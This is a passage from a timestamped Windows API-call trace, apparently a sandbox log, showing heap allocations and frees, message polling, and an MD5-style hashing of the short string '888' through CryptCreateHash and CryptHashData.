Flags=0x0, Size=0x10) returned 0x2e51490 [0233.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0233.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0233.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51310, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0233.326] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0233.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0233.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0233.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0233.328] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0233.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0233.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0233.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0233.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.329] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0233.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0233.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51550 [0233.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51550, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0233.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.394] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0233.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0233.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.395] CryptHashData (hHash=0xa87290, pbData=0x2e54f18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0233.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0233.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0233.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0233.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 